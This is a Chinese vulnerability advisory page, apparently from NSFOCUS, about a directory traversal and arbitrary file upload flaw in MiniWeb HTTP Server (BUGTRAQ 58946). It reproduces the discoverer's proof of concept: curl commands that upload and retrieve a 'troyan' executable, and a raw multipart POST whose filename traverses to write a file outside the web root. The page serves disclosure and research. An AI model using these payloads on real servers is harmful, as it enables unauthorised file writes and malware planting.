首页 -> 安全研究
安全研究
安全漏洞
MiniWeb HTTP Server目录穿越和任意文件上传漏洞
发布日期:2013-04-09
更新日期:2013-04-10
受影响系统:
sourceforge MiniWeb HTTP Server 0.x描述:
BUGTRAQ ID: 58946
MiniWeb是一个针对嵌入式应用而开发的微型Web Server,用C语言编写。
MiniWeb HTTP Server 20130309及其他版本存在安全漏洞,攻击者利用该漏洞可上传恶意文件到服务器任意位置。
<*来源:Akastep
链接:http://secunia.com/advisories/52923/
http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Arbitrary File Upload:
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ curl -I www.example.com
curl: (52) Empty reply from server
user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Uploading remotely our troyan to remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe
http://192.168.0.15:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html
<html><head><title>404 Not Found</title></head><body><h1>Not
Found</h1><p>The requested URL has no content.</p></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td
width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by
MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design
flaw.
user@myhost /cygdrive/c/dir1/dir2
$ curl www.example.com/taskmgr.exe>task2.exe
user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX
compressed
user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe
METHOD: POST
URL: http://www.example.com/AAAAAAAAAAAAAAAAAAAAAAA
Directory Traversal:
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------78522398122376
Content-Length: 84906
request body:
-----------------------------78522398122376
Content-Disposition: form-data; name="user"
-----------------------------78522398122376
Content-Disposition: form-data; name="pass"
-----------------------------78522398122376
Content-Disposition: form-data; name="file";
filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png
Dude! Your machine OwnEd!
-----------------------------78522398122376
Content-Disposition: form-data; name="button"
Upload
-----------------------------78522398122376--
================================================================================
Few Printscreens:
1remotesystem.PNG
http://s019.radikal.ru/i612/1304/09/510e3b430b04.png
2attackersends.PNG
http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png
3remotesystempwned.PNG
http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png
建议:
厂商补丁:
sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://miniweb.sourceforge.net/
浏览次数:3948
严重程度:0(网友投票)
绿盟科技给您安全的保障